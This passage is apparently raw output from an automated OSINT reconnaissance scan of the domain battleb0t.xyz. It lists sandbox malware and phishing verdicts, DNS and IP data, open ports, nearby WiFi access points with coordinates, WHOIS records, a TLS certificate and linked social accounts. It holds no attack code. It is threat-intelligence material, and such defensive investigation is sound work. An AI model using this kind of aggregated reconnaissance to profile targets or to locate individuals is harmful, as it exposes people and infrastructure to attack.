u'av_detect': u'75', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c1b0ccb36d7647d1b7621e60ed076d884365d92684abefad050cd75e9beecc45', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 110, u'job_id': u'6451a0cf79687fd6000a89f8', u'analysis_start_time': u'2023-05-02 23:46:23', u'vx_family': u'Phishing site', u'av_detect': u'72', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'4b4f047cb451367a5e10020c362772951184dee4d25f848faf5019cac33ea02c', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 100, u'job_id': u'6449514fdc084f44d70fb8e9', u'analysis_start_time': u'2023-04-26 16:29:04', u'vx_family': None, u'av_detect': u'64', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'464628d70f99d6b99af52fe9e8a6b50c99daff897554106627d1879b5cefcc31', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 100, u'job_id': u'6448ee799fb7bce1140d1c06', u'analysis_start_time': u'2023-04-26 09:27:22', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'4cc12dd870b3f87e4f84f7cfb62e90dcf84d879150c8c56c2175d2eee94c075a', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 110, u'job_id': u'644698ebdea01fcc9b066285', u'analysis_start_time': u'2023-04-24 14:57:48', u'vx_family': u'Phishing site', u'av_detect': u'57', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'21ddab683366fce20c7a4a6b5372ccaec820bb33c9f6e0cbacd401e383b7981d', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 100, u'job_id': u'643d5b962f8adb3969023bca', u'analysis_start_time': u'2023-04-17 14:45:43', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'faca7f991fbbc10ff6964ff2eb9314423171085118dcbfadeae6540b9a6c99e7', u'type': None, u'type_short': u'url', u'size': 635}, {u'environment_id': 100, u'job_id': u'643d5b9347bc24ef1706f172', u'analysis_start_time': u'2023-04-17 14:45:40', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'98f13f00bb30ace7e8ec5fc02c9a511c73719c34c2712ab4672f8f855d8f08aa', u'type': None, u'type_short': u'url', u'size': 631}, {u'environment_id': 160, u'job_id': u'643a0b6da0d638ec8e00c871', u'analysis_start_time': u'2023-04-15 02:26:53', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'1d0b2aa237378a01bbd09ffc1f482f8d311377ae1be8aa9954493f45cede5f3c', u'type': None, u'type_short': u'url', u'size': 125}, {u'environment_id': 100, u'job_id': u'6439f6717279c1209302f8d4', u'analysis_start_time': u'2023-04-15 00:57:22', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'622abf0777296535ee60d5a9c2299aa7730c75bb2544fd263030e36362d0f9f9', u'type': None, u'type_short': u'url', u'size': 217}, {u'environment_id': 160, u'job_id': u'6436d314383b2e50b20a01ba', u'analysis_start_time': u'2023-04-12 15:49:41', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'dc28bb880bca9b10afe9f098c9ce1add9535187a6066020e48e1e45d60f8ece8', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 110, u'job_id': u'6433cf55dc8eb5150c0012e8', u'analysis_start_time': u'2023-04-10 08:56:54', u'vx_family': u'Malicious site', u'av_detect': u'31', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'3ec2c8794f43ce84b17062c4ea4b2bd9e69bd847febf7370813e29eaff498bb3', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 120, u'job_id': u'642d780eb081708a1d0cd972', u'analysis_start_time': u'2023-04-05 13:30:54', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'd84ad76dbc17dc4539d49469071a2427b7e79fdc246d68b969e9de0d1e855535', u'type': None, u'type_short': u'url', u'size': 76}, {u'environment_id': 120, u'job_id': u'642d77c048c27e508a04f41c', u'analysis_start_time': u'2023-04-05 13:42:20', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'f8888b6fa1427ba3882de44e533fed25e64f7f76af4d032bc1a8856df7bb161b', u'type': None, u'type_short': u'url', u'size': 75}, {u'environment_id': 120, u'job_id': u'642c565f0903ac1a7e0630d5', u'analysis_start_time': u'2023-04-04 16:54:55', u'vx_family': None, u'av_detect': u'13', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'2736da0d2e6b42450c8f4a2bb43fc84eacd77047980b6252652cb66e5cd9f203', u'type': None, u'type_short': u'url', u'size': 56}, {u'environment_id': 120, u'job_id': u'6428c1465d9fb656e706f782', u'analysis_start_time': u'2023-04-01 23:41:59', u'vx_family': u'Malware.Generic', u'av_detect': u'1', u'environment_description': u'Windows 7 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'Tibia maps installer.exe', u'sha256': u'7fa4a84c46cff66e49b60e7fce7ab800e3990dbc29eb1ebb116576150a7c2d24', u'type': None, u'type_short': u'exe', u'size': 154868}, {u'environment_id': 110, u'job_id': u'64269b25d440fc6f8f10333c', u'analysis_start_time': u'2023-03-31 08:34:46', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_sco | 185.199.109.153 |
| 2023-05-12 03:33:10 | IP Address | No | DNS Resolver | 30 | 0 | 2 | 0 | None | 45.131.109.53 | vm.battleb0t.xyz |
| 2023-05-12 02:54:10 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::6815:6a6:80 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:1D:7E:37:25:D8) | 32.8608, -79.9746 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Pikatel (Net ID: 00:08:5C:FA:52:87) | 40.2024, 29.0398 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CableWiFi (Net ID: 00:0D:67:8C:21:B3) | 39.0469, -77.4903 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 172.67.135.9 |
| 2023-05-12 03:24:21 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | https://ayhu.xyz/lol.html |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [malsup.github.io]
https://www.openphish.com/feed.txt | malsup.github.io |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.152): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative innovation network - Collaborative innovation is a process in which multiple players contribute towards creating new products with customers and suppliers. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Barnes (Net ID: 00:06:25:FE:DD:85) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.232): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:45:19 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8200::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:03:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0067ed.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FA:75:55) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:12 | Affiliate - IP Address | No | DNS Look-aside | 2 | 0 | 3 | 0 | None | 207.154.228.159 | 207.154.228.169 |
| 2023-05-12 03:31:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 7 | 0 | None | 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net | Domain Name: TELLERIA.COM
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T18:34:23Z
Registry Expiry Date: 2023-08-11T18:34:23Z
Registrar: Gandi SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-222-C.GANDI.NET
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: telleria.com
Registry Domain ID: 1147715746_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.gandi.net
Registrar URL: http://www.gandi.net
Updated Date: 2022-06-03T06:12:07Z
Creation Date: 2007-08-11T16:34:23Z
Registrar Registration Expiration Date: 2023-08-11T18:34:23Z
Registrar: GANDI SAS
Registrar IANA ID: 81
Registrar Abuse Contact Email: abuse@support.gandi.net
Registrar Abuse Contact Phone: +33.170377661
Reseller: CodeSyntax
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status:
Domain Status:
Domain Status:
Domain Status:
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Marcajes Telleria S.L.
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province:
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: ES
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: 589e2ad15175f1c51c0a91d29b753337-1077158@contact.gandi.net
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: 098cbf54d6bdbb0fbdb022d1da6e4300-356617@contact.gandi.net
Name Server: NS-49-A.GANDI.NET
Name Server: NS-89-B.GANDI.NET
Name Server: NS-222-C.GANDI.NET
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL: http://www.codesyntax.com/
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 02:44:08 | Internet Name | No | CertSpotter | 19 | 1 | 1 | 0 | None | nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:47001 | 45.131.109.53 |
| 2023-05-12 02:53:07 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://funny.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | funny.battleb0t.xyz |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007sair.github.io]
https://www.openphish.com/feed.txt | 007sair.github.io |
| 2023-05-12 03:03:23 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00.github.io |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Twitter (Category: social)
https://twitter.com/baptistevauthey | baptistevauthey |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:dc:59:e7:99:ae:31:e4:ce:62:3e:34:b7:81:78:
80:f6:cd:df:74:9e:4d:b0:70:b7:b4:57:2f:17:e3:
3f:ff:b7:70:ed:8a:df:e6:f8:7a:13:c3:bd:36:4f:
0e:6a:68:6d:9d:a6:4b:2a:e9:cf:28:3d:81:ea:ca:
83:e7:16:86:77:3d:14:db:66:a8:57:ad:1a:0f:dd:
bd:7a:de:42:3b:37:3e:1c:ee:7d:2e:c6:c7:59:4e:
97:c9:0c:71:fa:0f:cd:7b:53:70:a6:5f:75:ef:13:
69:99:fc:c4:53:c7:8e:d0:09:93:90:8c:53:db:39:
20:10:21:64:71:0b:d6:b1:4c:65:ce:12:f1:57:52:
01:6a:62:40:bf:50:e1:af:0a:5c:4b:64:2c:31:51:
3e:93:5a:d7:3f:02:ea:a6:3c:b6:44:a0:a2:88:9a:
29:5e:d3:7c:e0:73:af:03:2d:32:ad:0b:a7:f4:f0:
67:e5:fc:86:ba:7a:2e:9a:6b:e7:a5:c3:0e:1d:6b:
4d:99:e3:e1:77:10:a6:f7:fe:e7:5d:ea:9a:d7:11:
bf:a0:de:50:ee:ee:9e:57:01:39:6f:73:ca:e6:06:
09:03:5a:1d:77:7b:8a:3f:fa:c2:82:ef:9a:8b:50:
68:73:cc:01:67:44:99:3d:d1:99:16:93:ec:e9:25:
6b:ff
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:B5:F3:29:BD:A0:20:09:5F:ED:BA:FE:
7D:4D:29:A6:16:28:D4:3D:6D:9D:84:56:4B:24:03:17:
F8:9F:1F:43:94:02:20:37:6C:63:6A:C8:C5:31:F7:F8:
33:84:21:F6:22:36:21:51:10:1E:BA:F6:84:58:81:0F:
85:70:0D:79:E6:82:79
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 04:43:01.703 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3C:77:99:EE:DE:DA:A2:24:43:1C:AD:EC:
69:6F:50:53:78:A5:D6:06:2E:44:C5:18:AE:9E:8D:2C:
AE:F9:60:A7:02:20:7C:67:55:E9:15:15:6F:0B:C0:6C:
03:77:3B:85:8A:11:43:C9:26:F4:1A:B8:01:95:2B:3D:
D3:07:79:D2:22:0E
Signature Algorithm: sha256WithRSAEncryption
0c:76:65:e5:fc:42:37:1e:b5:d9:a4:86:ff:e5:cd:2e:ec:b9:
8b:1a:2f:85:2b:80:24:2f:8a:38:f7:2f:90:da:4b:59:72:ac:
50:00:d6:f8:be:ee:24:3b:97:1d:9e:48:b2:ab:16:91:7b:75:
8f:65:64:9a:36:23:e5:c7:78:a7:ca:89:1e:c3:f6:bc:f0:7a:
00:a4:96:0d:2f:d5:7c:15:b8:30:04:f0:6e:7a:7a:c2:72:48:
1b:96:01:fb:1c:d6:83:0a:db:4d:dd:29:ab:01:f5:bb:4a:29:
4c:39:51:33:13:62:6b:bf:71:ac:1a:0c:bd:96:7a:89:44:b0:
a2:59:75:22:e1:9f:be:29:7e:a6:58:6f:00:c7:ed:a0:96:03:
62:21:81:04:3c:b2:c5:64:f6:c6:bf:6d:dc:6c:2b:eb:42:0d:
12:26:44:7a:6c:18:03:83:8a:20:96:54:35:04:94:b3:1c:97:
ef:43:37:f9:66:94:3d:0c:c6:25:ff:59:cf:19:e0:84:45:73:
0c:a3:7b:29:a2:ae:7b:74:86:0e:3b:cb:c9:a4:5d:a4:7c:ff:
46:b0:a1:64:c6:83:24:a3:95:75:fa:60:2b:1c:df:c0:09:f6:
0a:8b:24:73:9a:7e:de:fe:0d:e4:ae:f5:fc:b8:f6:0c:9f:a5:
7e:82:4c:c8
| battleb0t.xyz |
| 2023-05-12 03:08:35 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 185.199.111.154 | 185.199.111.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | hackerearth (Category: coding)
https://www.hackerearth.com/@login | login |
| 2023-05-12 03:24:51 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | United States | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
